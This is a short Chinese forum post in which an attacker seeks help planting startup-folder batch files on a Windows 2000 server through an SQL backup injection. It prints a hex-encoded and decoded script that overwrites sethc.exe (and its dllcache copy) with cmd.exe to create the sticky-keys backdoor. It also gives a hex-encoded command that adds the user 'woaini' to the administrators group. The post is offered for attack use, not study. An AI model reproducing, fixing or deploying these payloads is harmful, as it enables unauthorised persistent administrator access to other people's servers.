关于sql 备份启动项的问题
如图1 备份了一个start.bat 是shift的,但是他是2k的机器。所以想 弄个加帐号的bat上去。但是怎么转都是不行。我也没加上去。只是测试了下。总是不行 (0x130A0D0A404563686F206F66660D0A406364202577696E646972250D0A4064656C20646972202F73202F612073657468632E6578650D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C73657468632E657865202F790D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C646C6C63616368655C73657468632E657865202F790D0A)这个就是那个 shift的脚本。我自己转了一个net user woaini woaini /add & net localgroup administrators woaini /add 十六进制是(0x6E6574207573657220776F61696E6920776F61696E692026206E6574206C6F63616C67726F75702061646D696E6973747261746F727320776F61696E69202F616464DA)但是我备份上去之后。。这里注意了。我是直接拿一个服务器测试的。备份上去了之后我就直接跑到服务器的启动项里找。已经备份上去了。但是我运行那个bat他根本没有加帐号。不晓得为什么。懂的来解决下。高手不要吝啬!那个shift的脚本我还原是这个样子的如图2(@Echo off
@cd %windir%
@del dir /s /a sethc.exe
@copy %windir%\system32\cmd.exe %windir%\system32\sethc.exe /y
@copy %windir%\system32\cmd.exe %windir%\system32\dllcache\sethc.exe /y)我没把0x写进去转的要是加了0x的话前面会多出两个感叹号(!!)现在注意了这个shift的后门很奇怪。也许是我的不对不应该是直接转"net user woaini woaini /add & net localgroup administrators woaini /add"这一段吗。 跟谁学的?
页:
[1]